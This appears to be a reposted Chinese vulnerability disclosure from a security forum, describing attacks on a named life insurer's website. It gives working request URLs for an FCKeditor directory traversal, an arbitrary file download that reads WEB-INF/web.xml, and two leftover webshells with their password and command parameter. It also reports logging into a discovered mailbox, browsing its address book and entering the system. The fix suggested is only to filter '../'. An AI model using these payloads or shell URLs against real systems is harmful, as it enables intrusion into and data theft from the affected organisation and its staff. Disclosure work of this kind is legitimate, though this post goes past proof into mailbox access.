HanDs
NO.2

[7月漏洞公开] 长城人寿某系统漏洞打包(目录遍历/文件下载/前人shell) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

目录遍历/文件下载/前人shell,我只是希望能把shell删干净,所以提一下

详细说明:

http://www.4008118228.cn/index.shtml

QQ截图20160602204357.png



系统使用了fck编辑器

http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../

QQ截图20160602204449.png



QQ截图20160602204646.png



http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../Include/

QQ截图20160603164654.png

漏洞证明:

在遍历目录的时候发现一个文件

http://www.4008118228.cn/common/LoadFile.jsp

QQ截图20160603164749.png



访问的时候,会把绝对路径爆出来

简单构造就可以下载文件了

http://www.4008118228.cn/common/LoadFile.jsp?FileName=LoadFile.jsp

QQ截图20160603164844.png



http://www.4008118228.cn/common/LoadFile.jsp?FileName=../WEB-INF/web.xml

QQ截图20160603164918.png





同样的文件在此处还发现一个

http://www.4008118228.cn/Platform/LoadFile.jsp

QQ截图20160603164954.png



一并改了吧





shell:

QQ截图20160603165026.png



code 区域
http://www.4008118228.cn/shell.jsp?pwd=023&i=ls /



这里还有一枚遗留,点出来一并删了吧

code 区域
http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=ls





QQ截图20160603095639.png



使用找到的mail登录邮箱

QQ截图20160603100254.png



通讯录

QQ截图20160603100443.png



QQ截图20160603100546.png





最后登录系统

QQ截图20160603100027.png

修复方案:

过滤../


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
长城 陈┒创
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组